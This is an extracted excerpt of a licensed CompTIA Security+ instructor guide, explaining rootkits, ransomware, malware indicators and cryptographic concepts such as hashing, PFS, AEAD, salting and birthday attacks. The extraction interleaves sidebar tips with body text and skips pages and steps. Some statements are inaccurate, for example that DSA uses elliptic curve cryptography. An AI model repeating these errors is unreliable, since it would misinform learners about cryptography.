In Windows, malware can only be manually installed with local administrator privileges. Rootkits
This means the user must be confident enough in the installer package to enter the
credentials or accept the User Account Control (UAC) prompt. Windows tries to protect
the system from abuse of administrator privileges. Critical processes run with a higher
level of privilege (SYSTEM). Consequently, Trojans installed in the same way as regular
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
88 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
software cannot conceal their presence entirely and will show up as a running process
or service. Often the process image name is configured to be similar to a genuine
executable or library to avoid detection. For example, a Trojan may use the filename
"run32d11" to masquerade as "run32dll". To ensure persistence (running when the
computer is restarted), the Trojan may have to use a registry entry or create itself as a
service, which can usually be detected fairly easily.
If the malware can be delivered as the payload for an exploit of a severe vulnerability,
it may be able to execute without requiring any authorization using SYSTEM privileges.
Alternatively, the malware may be able to use an exploit to escalate privileges after
installation. Malware running with this level of privilege is referred to as a rootkit. The
term derives from UNIX/Linux where any process running as root has unrestricted
access to everything from the root of the file system down.
In theory, there is nothing about the system that a rootkit could not change. In practice,
Windows uses other mechanisms to prevent misuse of kernel processes, such as
code signing (microsoft.com/security/blog/2017/10/23/hardening-the-system-and-
maintaining-integrity-with-windows-defender-system-guard). Consequently, what
a rootkit can do depends largely on adversary capability and level of effort. When
dealing with a rootkit, you should be aware that there is the possibility that it can
compromise system files and programming interfaces, so that local shell processes,
such as Explorer, taskmgr, or tasklist on Windows or ps or top on Linux, plus port
scanning tools, such as netstat, no longer reveals its presence (at least, if run from the
infected machine). A rootkit may also contain tools for cleaning system logs, further
concealing its presence (microsoft.com/en-us/wdsi/threats/malware-encyclopedia-
description?Name=Win32%2fCutwail).
Software processes can run in one of several "rings." Ring 0 is the most privileged (it
provides direct access to hardware) and so should be reserved for kernel processes only.
Ring 3 is where user-mode processes run; drivers and I/O processes may run in Ring 1 or
Ring 2. This architecture can also be complicated by the use of virtualization.
There are also examples of rootkits that can reside in firmware (either the computer
firmware or the firmware of any sort of adapter card, hard drive, removable drive, or
peripheral device). These can survive any attempt to remove the rootkit by formatting
the drive and reinstalling the OS. For example, the US intelligence agencies have
developed DarkMatter and QuarkMatter EFI rootkits targeting the firmware on Apple
Macbook laptops (pcworld.com/article/3179348/after-cia-leak-intel-security-releases-
detection-tool-for-efi-rootkits.html).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 89
The crypto-malware class of ransomware attempts to encrypt data files on any fixed,
removable, and network drives. If the attack is successful, the user will be unable to
access the files without obtaining the private encryption key, which is held by the
attacker. If successful, this sort of attack is extremely difficult to mitigate, unless the
user has up to date backups of the encrypted files. One example of this is Cryptolocker,
a Trojan that searches for files to encrypt and then prompts the victim to pay a sum of
money before a certain countdown time, after which the malware destroys the key that
allows the decryption.
Ransomware uses payment methods, such as wire transfer, cryptocurrency, or
premium rate phone lines, to allow the attacker to extort money without revealing his
or her identity or being traced by local law enforcement.
Another type of crypto-malware hijacks the resources of the host to perform
cryptocurrency mining. This is referred to as crypto-mining or cryptojacking. The total
number of coins within a cryptocurrency is limited by the difficulty of performing the
calculations necessary to mint a new digital coin. Consequently, new coins can be very
valuable, but it takes enormous computing resources to discover them. Cryptojacking
is often performed across botnets.
Some types of malware do not trigger automatically. Having infected a system, they
wait for a pre-configured time or date (time bomb) or a system or user event (logic
bomb). Logic bombs also need not be malware code. A typical example is a disgruntled
system administrator who leaves a scripted trap that runs in the event his or her
account is deleted or disabled. Anti-virus software is unlikely to detect this kind of
malicious script or program. This type of trap is also referred to as a mine.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
90 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Sandbox Execution
If it is not detected by endpoint protection, you may want to analyze the suspect code
in a sandboxed environment. A sandbox is a system configured to be completely
isolated from its host so that the malware cannot "break out." The sandbox will be
designed to record file system and registry changes plus network activity. Cuckoo
is packaged software that aims to provide a turnkey sandbox solution
(cuckoosandbox.org).
Resource Consumption
Abnormal resource consumption can be detected using a performance monitor, Task
Manager, or the top Linux utility. Indicators such as excessive and continuous CPU
usage, memory leaks, disk read/write activity, and disk space usage can be signs of
malware, but can also be caused by many other performance and system stability
issues. Also, it is only really poorly written malware or malware that performs intensive
operations (botnet DDoS, cryptojacking, and cryptoransomware, for instance) that
displays this behavior. Resource consumption could be a reason to investigate a
system rather than definitive proof of infection.
File System
While fileless malware is certainly prevalent, file system change or anomaly analysis
is still necessary. Even if the malware code is not saved to disk, the malware is still
likely to interact with the file system and registry, revealing its presence by behavior.
A computer's file system stores a great deal of useful metadata about when files were
created, accessed, or modified. Analyzing these metadata and checking for suspicious
temporary files can help you establish your timeline of events for an incident that has
left traces on a host and its files.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 91
version of Task Manager. You can view extra information about each process and
better understand how processes are created in parent/child relationships.
In this example, the Metasploit Framework is being used to obtain access via a
remotely executed PowerShell prompt, with privileges obtained by passing a captured
hash. This attack leverages the Sysinternals PsExec utility to drop a service executable
into the Admin$ share on the remote machine. In this variant of the attack, the service
starts PowerShell. Pointing to the powershell.exe image in Process Explorer shows the
parameters that the process launched with. In this case, the command used to start
this is not typical of PowerShell usage. There is a long string of characters, which is
binary code represented in Base64. The script is injecting this into a new DLL, stored in
memory only.
Observing use of PsExec to invoke a PowerShell script that creates memory-resident shellcode.
(Screenshot: Process Explorer docs.microsoft.com/en-us/sysinternals.)
This sort of behavior can only be observed in real-time when the malware is executed
in a sandbox. Threat hunting and automated detection tools can use detailed logging,
such as that provided by System Monitor (github.com/SwiftOnSecurity/sysmon-config),
to record and identify malicious process behavior.
Along with observing how a process interacts with the file system, network activity is
one of the most reliable ways to identify malware. Threat data can be used to correlate
connections to known-bad IP addresses and domains, but malware may try to connect
to continually shifting endpoints, utilizing techniques such as fast-flux and domain
generation algorithms (DGA). It may try to use social media and cloud services to blend
in with legitimate traffic.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
92 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Indicators of Malware-Based Attacks
Answer the following questions:
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 93
Lesson 4
Summary
You should be able to identify the social engineering and malware-based methods that Teaching
threat actors use to effect intrusions. Tip
Check that students
Guidelines for Identifying Social Engineering and Malware are confident about
the content that has
been covered. If there
Follow these guidelines when you use security assessments to protect security systems
is time, revisit any
against social engineering and malware attacks: content examples that
• Use training and education programs to help employees to recognize how social they have questions
about. If you have
engineering is effective (authority, intimidation, consensus, scarcity, familiarity, trust, used all the available
and urgency). time for this lesson
block, note the issues,
• Use policies and procedures that hinder social engineers from eliciting information and schedule time for
or obtaining unauthorized access. a review later in the
course.
• Educate users to recognize phishing and pharming attempts, such as validating
domain names and identifying suspicious messages. Interaction
Opportunity
• Use training and education programs to help employees recognize types of malware Optionally, discuss
threat (Trojan, PUP, spyware, backdoor, bots, rootkits, and ransomware) and the with students how
vectors by which malware can execute. they might have
experience of social
• Use security filters and limited privileges to restrict the ability of users to execute engineering or
infected files or scripts. malware attacks,
the impact they had,
• Consider implementing behavior-based endpoint protection suites that can perform and how they were
resolved.
more effective detection of fileless malware.
• Consider using threat data feeds to assist with identification of command and
control networks.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 5
Summarizing Basic
Cryptographic Concepts
Lesson Objectives
In this lesson, you will:
• Compare and contrast cryptographic ciphers.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
96 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 5A
Compare and Contrast
Cryptographic Ciphers
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 97
Hashing is the simplest type of cryptographic operation. A cryptographic hashing Hashing Algorithms
algorithm produces a fixed length string from an input plaintext that can be of any
length. The output can be referred to as a checksum, message digest, or hash, The Teaching
function is designed so that it is impossible to recover the plaintext data from the Tip
digest (one-way) and so that different inputs are unlikely to produce the same output Hash functions are
(a collision). mostly used for
integrity (signatures
A hashing algorithm is used to prove integrity. For example, Bob and Alice can compare and message digests)
the values used for a password in the following way: and password storage
(confidentiality).
1. Bob already has a digest calculated from Alice's plaintext password. Bob cannot
recover the plaintext password value from the hash. While the names
of cryptographic
2. When Alice needs to authenticate to Bob, she types her password, converts it to a algorithms have been
removed from the
hash, and sends the digest to Bob. certification objectives,
they are still present
3. Bob compares Alice's digest to the hash value he has on file. If they match, he can in the acronyms list,
be sure that Alice typed the same password. and the injunction
on the acronyms list
As well as comparing password values, a hash of a file can be used to verify the is "Candidates are
integrity of that file after transfer. encouraged to review
the complete list
1. Alice runs a hash function on the setup.exe file for her product. She publishes the and attain a working
digest to her website with a download link for the file. knowledge of all listed
acronyms as part of a
2. Bob downloads the setup.exe file and makes a copy of the digest. comprehensive exam
preparation program."
3. Bob runs the same hash function on the downloaded setup.exe file and Consequently, the
compares it to the reference value published by Alice. If it matches the value names of the main
published on the website, the integrity of the file can be assumed. products have been
retained.
4. Consider that Mallory might be able to substitute the download file for a The syllabus also uses
malicious file. Mallory cannot change the reference hash, however. the term checksum
for a message digest
5. This time, Bob computes a hash but it does not match, leading him to suspect (under the forensics
that the file has been tampered with. objective) so we
are using that here
too. You might want
to note that hash
functions produce
a specific type of
checksum, but there
are others with
different properties,
such as a parity
checksum.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
98 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Computing an SHA value from a file. (Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 99
A symmetric cipher is one in which encryption and decryption are both performed Symmetric Encryption
by the same secret key. The secret key is so-called because it must be kept secret.
If the key is lost or stolen, the security is breached. Symmetric encryption is used Teaching
for confidentiality. For example, Alice and Bob can share a confidential file in the Tip
following way: Note that symmetric
encryption is mostly
1. Alice and Bob meet to agree which cipher to use and a secret key value. They
used for privacy
both record the value of the secret key, making sure that no one else can (confidentiality). Test
discover it. that the students can
explain to you why
2. Alice encrypts a file using the cipher and key. it cannot be used
for authentication,
3. She sends only the ciphertext to Bob over the network. integrity, or non-
repudiation.
4. Bob receives the ciphertext and is able to decrypt it by applying the same cipher
with his copy of the secret key.
Symmetric encryption is also referred to as single key or private key or shared secret. Note
that "private key" is also used to refer to part of the public key cryptography process, so take
care not to confuse the two uses.
Symmetric encryption is very fast. It is used for bulk encryption of large amounts of
data. The main problem is secure distribution and storage of the key, or the exact
means by which Alice and Bob "meet" to agree the key. If Mallory intercepts the key
and obtains the ciphertext, the security is broken.
Note that symmetric encryption cannot be used for authentication or integrity, because
Alice and Bob are able to create exactly the same secrets, because they both know the
same key.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
100 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Key Length
The range of key values available to use with a particular cipher is called the keyspace.
The keyspace is roughly equivalent to two to the power of the size of the key. Using a
longer key (256 bits rather than 128 bits, for instance) makes the encryption scheme
stronger. You should realize that key lengths are not equivalent when comparing
different algorithms, however. Recommendations on minimum key length for any
given algorithm are made by identifying whether the algorithm is vulnerable to
cryptanalysis techniques and by the length of time it would take to "brute force" the
key, given current processing resources.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 101
5. Bob receives the message and is able to decrypt it using his private key.
6. If Mallory has been snooping, he can intercept both the message and the public
key.
7. However, Mallory cannot use the public key to decrypt the message, so the
system remains secure.
Asymmetric encryption can be used to prove identity. The holder of a private key
cannot be impersonated by anyone else. The drawback of asymmetric encryption is
that it involves substantial computing overhead compared to symmetric encryption.
The message cannot be larger than the key size. Where a large amount of data is being
encrypted on disk or transported over a network, asymmetric encryption is inefficient.
Consequently, asymmetric encryption is mostly used for authentication and non-
repudiation and for key agreement and exchange. Key agreement/exchange refers
to settling on a secret symmetric key to use for bulk encryption without anyone else
Show Slide(s)
discovering it.
Public Key
Public Key Cryptography Algorithms Cryptography
Algorithms
Asymmetric encryption is often referred to as public key cryptography. Many public
key cryptography products are based on the RSA algorithm. Ron Rivest, Adi Shamir, Teaching
and Leonard Adleman published the RSA cipher in 1977 (rsa.com). The RSA algorithm Tip
provides the mathematical properties for deriving key pairs and performing the
There's not much
encryption and decryption operations. This type of algorithm is called a trapdoor point trying to
function, because it is easy to perform using the public key, but difficult to reverse describe ECC without
without knowing the private key. mentioning RSA.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
102 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Elliptic curve cryptography (ECC) is another type of trapdoor function that can be
used in public key cryptography ciphers. The principal advantage of ECC over RSA's
algorithm is that there are no known "shortcuts" to cracking the cipher or the math
that underpins it, regardless of key length. Consequently, ECC used with a key size of
256 bits is very approximately comparable to RSA with a key size of 2048 bits.
RSA key pair security depends on the difficulty of finding the prime factors of very large
integers (modular exponentiation). ECC depends on the discrete logarithm problem.
Cloudflare have produced an excellent overview of the differences (blog.cloudflare.com/a-
relatively-easy-to-understand-primer-on-elliptic-curve-cryptography).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 103
Review Activity:
Cryptographic Ciphers
Answer the following questions:
In cryptography, the security of the message is guaranteed by the security of the key.
The system does not depend on hiding the algorithm or the message (security by
obscurity).
Because two parties can hash the same data and compare checksums to see if they
match, hashing can be used for data verification in a variety of situations, including
password authentication. Hashes of passwords, rather than the password plaintext,
can be stored securely or exchanged for authentication. A hash of a file or a hash code
in an electronic message can be verified by both parties.
Confidentiality—symmetric ciphers are generally fast and well suited to bulk encrypting
large amounts of data.
Each key can reverse the cryptographic operation performed by its pair but cannot
reverse an operation performed by itself. The private key must be kept secret by the
owner, but the public key is designed to be widely distributed. The private key cannot
be determined from the public key, given a sufficient key size.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
104 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 5B
Summarize Cryptographic
Modes of Operation
4. Bob then calculates his own checksum for the document (using the same
algorithm as Alice) and compares it with Alice's hash.
If the two hashes are the same, then the data has not been tampered with during
transmission, and Alice's identity is guaranteed. If either the data had changed or a
malicious user (Mallory) had intercepted the message and used a different private key,
the digests would not match.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 105
It is important to remember that a digital signature is a hash that is then encrypted using
a private key. Without the encryption, another party could easily intercept the file and the
hash, modify the file and compute a new hash, and then send the modified file and hash
to the recipient. It is also important to realize that the recipient must have some means of
validating that the public key really was issued by Alice. Also note that digital signatures do
not provide any message confidentiality.
The Digital Signature Algorithm (DSA) is a slightly different format for achieving
the same sort of goal. DSA uses elliptic curve cryptography (ECC) rather than the RSA
cipher.
Symmetric encryption is the only practical means of encrypting and decrypting Digital Envelopes and
large amounts of data (bulk encryption), but it is difficult to distribute the secret key Key Exchange
securely. Public key cryptography makes it easy to distribute a key, but can only be
used efficiently with small amounts of data. Therefore, both are used within the same Teaching
product in a type of key exchange system known as a digital envelope or hybrid Tip
encryption. A digital envelope allows the sender and recipient to exchange a symmetric Stress that asymmetric
encryption key securely by using public key cryptography: encryption is slow,
and so is only used
1. Alice obtains a copy of Bob's public key. on small amounts of
data (signing hashes
2. Alice encrypts her message using a secret key cipher, such as AES. In this context, or encrypting secret
the secret key is referred to as a session key. keys).
4. Alice attaches the encrypted session key to the ciphertext message in a digital
envelope and sends it to Bob.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
106 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Note that in this process, it is the recipient's public key that is used to perform
encryption and the recipient's private key that is used for decryption. The validity of the
whole digital envelope can be proved using a message authentication code.
In all these implementations, it is critical that the private key be kept secure and available
only to the authorized user.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 107
When using a digital envelope, the parties must exchange or agree upon a bulk Perfect Forward
encryption secret key, used with the chosen symmetric cipher. In the original Secrecy
implementation of digital envelopes, the server and client exchange secret keys, using
the server's RSA key pair to protect the exchange from snooping. In this key exchange Teaching
model, if data from a session were recorded and then later the server's private key Tip
were compromised, it could be used to decrypt the session key and recover the The terms "key
confidential session data. exchange" and "key
agreement" are often
This risk from RSA key exchange is mitigated by perfect forward secrecy (PFS). PFS taken to mean the
uses Diffie-Hellman (D-H) key agreement to create ephemeral session keys without same thing, but point
using the server's private key. Diffie-Hellman allows Alice and Bob to derive the same out that there are
shared secret just by agreeing some values that are all related by some trapdoor different mechanisms.
With key agreement,
function. In the agreement process, they share some of them, but keep others private. the client does not
Mallory cannot possibly learn the secret from the values that are exchanged publicly transmit an encrypted
(en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange). The authenticity of session key to the
the values sent by the server is proved by using a digital signature. server. The client and
server use Diffie-
Hellman (D-H) to
derive the same secret
key value.
Note that in TLS
1.3, only PFS cipher
suites are allowed.
RSA key exchange is
deprecated. The RSA
algorithm can still
be used for signing,
however. The values
exchanged as part of
D-H need to be signed
to prove authenticity
and prevent a man-in-
the-middle attack.
Using Diffie-Hellman to derive a secret value to use to generate a shared symmetric encryption
key securely over a public channel. (Images © 123RF.com.)
Using ephemeral session keys means that any future compromise of the server will not
translate into an attack on recorded data. Also, even if an attacker can obtain the key
for one session, the other sessions will remain confidential. This massively increases
the amount of cryptanalysis that an attacker would have to perform to recover an
entire "conversation."
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
108 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
PFS can be implemented using either the Diffie-Hellman Ephemeral mode (DHE or
EDH) or Elliptic Curve Diffie-Hellman Ephemeral mode (ECDHE) algorithms. To use
PFS, the server and client must negotiate use of a mutually supported cipher suite.
In 2014, a Heartbleed bug was discovered in the way some versions of OpenSSL work that
allows remote users to grab 64K chunks of server memory contents (heartbleed.com). This
could include the private key, meaning that any communications with the server could be
compromised. The bug had been present for around two years. This illustrates the value of
PFS, but ironically many servers would have been updated to the buggy version of OpenSSL
to enable support for PFS.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 109
Symmetric algorithms do not provide message integrity or authentication. The basic Authenticated Modes
CBC and counter modes of operation are unauthenticated. While a man-in-the-middle of Operation
cannot decrypt them directly without the secret key, the ciphertexts are vulnerable to
arbitrary data being inserted or modified to break the encryption scheme, referred to Teaching
as a chosen ciphertext attack. Tip
Students should not
Authenticated Encryption need to recognize the
cipher suite names
A message authentication code (MAC) provides an authentication and integrity for the exam, but
mechanism by hashing a combination of the message output and a shared secret in practical terms
key. The recipient can perform the same process using his or her copy of the secret they would be highly
recommended to
key to verify the data. This type of authenticated encryption scheme is specified in a
learn them anyway,
cipher suite as separate functions, such as "AES CBC with HMAC-SHA." Unfortunately, not least because
the implementation of this type of authenticated mode in AES CBC is vulnerable to a TLS 1.3 is reduced to
type of cryptographic attack called a padding oracle attack (docs.microsoft.com/en-us/ just three algorithms.
dotnet/standard/security/vulnerabilities-cbc-mode). Consequently, we
are including the
Authenticated Encryption with Additional Data (AEAD) relevant acronyms for
recognition purposes,
The weaknesses of CBC arising from the padding mechanism means that stream but not trying to
explain the difference
ciphers or counter modes are strongly preferred. These use Authenticated Encryption between, say, GMAC
with Additional Data (AEAD) modes of operation. In an AEAD scheme, the associated and CBC-MAC.
data allows the receiver to use the message header to ensure the payload has not
been replayed from a different communication stream.
An AEAD mode is identified by a single hyphenated function name, such as AES-GCM or
AES-CCM. The ChaCha20-Poly1305 stream cipher has been developed as an alternative
to AES.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
110 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Cryptographic Modes of Operation
Answer the following questions:
A hashing function is used to create a message digest. The digest is then signed using
the sender's private key. The resulting signature can be decrypted by the recipient
using the sender's public key and cannot be modified by any other agency. The
recipient can calculate his or her own digest of the message and compare it to the
signed hash to validate that the message has not been altered.
The recipient's public key (typically from the server's key pair).
True. PFS ensures that ephemeral keys are used to encrypt each session. These keys
are destroyed after use.
Diffie-Hellman allows the sender and recipient to derive the same value (the session
key) from some other pre-agreed values. Some of these are exchanged, and some kept
private, but there is no way for a snooper to work out the secret just from the publicly
exchanged values. This means session keys can be created without relying on the
server's private key, and that it is easy to generate ephemeral keys that are different
for each session.
5. What type of bulk encryption cipher mode of operation offers the best
security?
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 111
Topic 5C
Summarize Cryptographic Use
Cases and Weaknesses
Encryption allows subjects to identify and authenticate themselves. The subject could
be a person, or a computer such as a web server.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
112 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 113
Integrity is proved by hashing algorithms, which allow two parties to derive the same Cryptography
checksum and show that a message or data has not been tampered with. A basic hash Supporting Integrity
function can also be used with a shared secret to create a message authentication and Resiliency
code (MAC), which prevents a man-in-the-middle tampering with the checksum.
Teaching
As well as providing integrity at the level of individual messages, cryptography can be Tip
used to design highly resilient control systems. A control system is one with multiple
GCHQ’s Dr Ian Levy's
parts, such as sensors, workstations, and servers, and complex operating logic. Such article on designing
a system is resilient if compromise of a small part of the system is prevented from the security system
allowing compromise of the whole system. Cryptography assists this goal by ensuring for smart meters in
the authentication and integrity of messages delivered over the control system. the UK (ncsc.gov.
uk/information/
Integrity and resiliency are also an issue for computer code. If a threat actor has the-smart-security-
administrator privileges, they can change the operation of legitimate code to make it behind-the-gb-smart-
work as malware. A developer can make tampering more difficult using obfuscation. metering-system) is a
Obfuscation is the art of making a message difficult to understand. Obfuscated source good example of some
of the considerations
code is rewritten in a way that does not affect the way the computer compiles or that go into the design
executes the code, but makes it difficult for a person reading the code to understand of a highly resilient
how it works. system.
Cryptography is a very effective way of obfuscating a message, but unfortunately, it
is too effective in the case of source code because it also means the code cannot be
understood (executed) by the computer. At some point, the code must be decrypted to
be executed. The key used for decryption usually needs to be bundled with the source
code, and this means that you are relying on security by obscurity rather than strong
cryptography. Attempts to protect an embedded key while preserving the functionality
of the code—known as white box cryptography—have all been broken. There are no
commercial solutions currently available to overcome this problem, but the subject is
one of much research interest.
Differences between ciphers make them more or less useful for resource-constrained Cryptographic
environments. The main performance factors are as follows: Performance
Limitations
• Speed—for symmetric ciphers and hash functions, speed is the amount of data per
second that can be processed. Asymmetric ciphers are measured by operations per Teaching
second. Speed has the most impact when large amounts of data are processed. Tip
• Time/latency—for some use cases, the time required to obtain a result is more The syllabus places
a lot of emphasis on
important than a data rate. For example, when a secure protocol depends on
limitations and use
ciphers in the handshake phase, no data transport can take place until the cases, so make sure
handshake is complete. This latency, measured in milliseconds, can be critical to students understand
performance. these factors.
• Size—the security of a cipher is strongly related to the size of the key, with longer
keys providing better security. Note that the key size cannot be used to make
comparisons between algorithms. For example, a 256-bit ECC key is stronger than
a 2048-bit RSA key. Larger keys will increase the computational overhead for each
operation, reducing speed and increasing latency.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
114 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
In selecting a product or individual cipher for a particular use case, a tradeoff must
be achieved between the demand for the best security available and the resources
available for implementation.
• Low power devices—some technologies or ciphers configured with longer keys
require more processing cycles and memory space. This makes them slower
and means they consume more power. Consequently, some algorithms and key
strengths are unsuitable for handheld devices and embedded systems, especially
those that work on battery power. Another example is a contactless smart card,
where the card only receives power from the reader and has fairly limited storage
capacity, which affects the maximum key size supported.
• Low latency uses—this can impact protocol handshake setup times. A longer
Show Slide(s) handshake will manifest as delay for the user, and could cause timeout issues
with some applications. Also, if cryptography is deployed with a real time-sensitive
Cryptographic Security channel, such as voice or video, the processing overhead on both the transmitter
Limitations and receiver must be low enough not to impact the quality of the signal.
Teaching
Tip Cryptographic Security Limitations
You can illustrate a
weak key problem Resource constraints may require you to make a tradeoff between security and
by referencing the performance, but you cannot trade too far.
Debian OpenSSL
vulnerability. Two lines Entropy and Weak Keys
of code in Debian's
OpenSSL package Entropy is a measure of disorder. A plaintext will usually exhibit low entropy as
were removed when it represents a message in a human language or programming language or data
highlighted by a
debugging application.
structure. The plaintext must be ordered for it to be intelligible to a person, computer
These two lines processor, or database. One of the requirements of a strong cryptographic algorithm is
were responsible to produce a disordered ciphertext. Put another way, the ciphertext must exhibit a high
for ensuring that level of entropy. If any elements of order from the plaintext persist, it will make the
the keyspace was ciphertext vulnerable to cryptanalysis, and the algorithm can be shown to be weak.
large and random.
Consequently, for It is important to realize that just because an algorithm, such as AES, is considered
two years, Debian strong does not mean that the implementation of that cipher in a programming library
OpenSSL servers is also strong. The implementation may have weaknesses. It is vital to monitor the
using this patch were
status of this type of programming code and apply updates promptly. If a weakness
generating keys from
a range of about is revealed, any keys issued under the weak version must be replaced and data re-
32,000. Another encrypted.
example is the NSA-
inserted backdoor in A weak key is one that produces ciphertext that is lower entropy than it should be. If
a RNG proposed for a key space contains weak keys, the technology using the cipher should prevent use
use with ECC (isaca. of these keys. DES and RC4 are examples of algorithms known to have weak keys. The
org/resources/isaca- way a cipher is implemented in software may also lead to weak keys being used. An
journal/issues/2016/ example of this is a bug in the pseudo-random number generator for the OpenSSL
volume-3/can-elliptic-
server software for Debian Linux, discovered in 2008 (wiki.debian.org/SSLkeys). A
curve-cryptography-
be-trusted-a-brief- weak number generator leads to many published keys sharing a common factor. A
analysis-of-the- cryptanalyst can test for the presence of these factors and derive the whole key much
security-of-a-popular- more easily. Consequently, the true random number generator (TRNG) or pseudo
cryptosyste). RNG (PRNG) module in the cryptographic implementation is critical to its strength.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 115
You can read more about true versus pseudo random number generation at random.org.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
116 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
2. Mallory intercepts the communication, retaining Bob's public key, and sends his
own public key to Alice.
4. Mallory intercepts the message and decrypts it using his private key.
5. Mallory then encrypts a message (possibly changing it) with Bob's public
key and sends it to Bob, leaving Alice and Bob oblivious to the fact that their
communications have been compromised.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 117
requests the use of SSL. It then becomes easier for Mallory to forge the signature of a
certificate authority that Alice trusts and have Alice trust his public key.
Entropy is a concern whenever a cryptographic system makes use of user-generated Key Stretching and
data, such as a password. Users tend to select low entropy passwords, because they Salting
are easier to remember. A couple of technologies try to compensate for this.
Key Stretching
Key stretching takes a key that's generated from a user password and repeatedly
converts it to a longer and more random key. The initial key may be put through
thousands of rounds of hashing. This might not be difficult for the attacker to replicate
so it doesn't actually make the key stronger, but it slows the attack down, as the
attacker has to do all this extra processing for each possible key value. Key stretching
can be performed by using a particular software library to hash and save passwords
when they are created. The Password-Based Key Derivation Function 2 (PBKDF2) is
very widely used for this purpose, notably as part of Wi-Fi Protected Access (WPA).
Salting
Passwords stored as hashes are vulnerable to brute force and dictionary attacks. A
password hash cannot be decrypted; hash functions are one-way. However, an attacker
can generate hashes to try to find a match for password hash captured from network
traffic or password file. A brute force attack simply runs through every possible
combination of letters, numbers, and symbols. A dictionary attack creates hashes of
common words and phrases.
Both these attacks can be slowed down by adding a salt value when creating the hash,
so you compute:
(salt + password) * SHA = hash
The salt is not kept secret, because any system verifying the hash must know the value
of the salt. It simply means that an attacker cannot use pre-computed tables of hashes.
The hash values must be recompiled with the specific salt value for each password.
A birthday attack is a type of brute force attack aimed at exploiting collisions in Collisions and the
hash functions. A collision is where a function produces the same hash value for two Birthday Attack
different plaintexts. This type of attack can be used for the purpose of forging a digital
signature. The attack works as follows:
1. The attacker creates a malicious document and a benign document that produce
the same hash value. The attacker submits the benign document for signing by
the target.
2. The attacker then removes the signature from the benign document and adds it
to the malicious document, forging the target's signature.
The trick here is being able to create a malicious document that outputs the same hash
as the benign document. The birthday paradox means that the computational time
required to do this is less than might be expected. The birthday paradox asks how large
must a group of people be so that the chance of two of them sharing a birthday is 50%.
The answer is 23, but people who are not aware of the paradox often answer around
180 (365/2). The point is that the chances of someone sharing a particular birthday are
small, but the chances of any two people sharing any birthday get better and better as
you add more people: 1 – (365 * (365-1) * (365 – 2) ... * (365 – (N-1)/365N)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
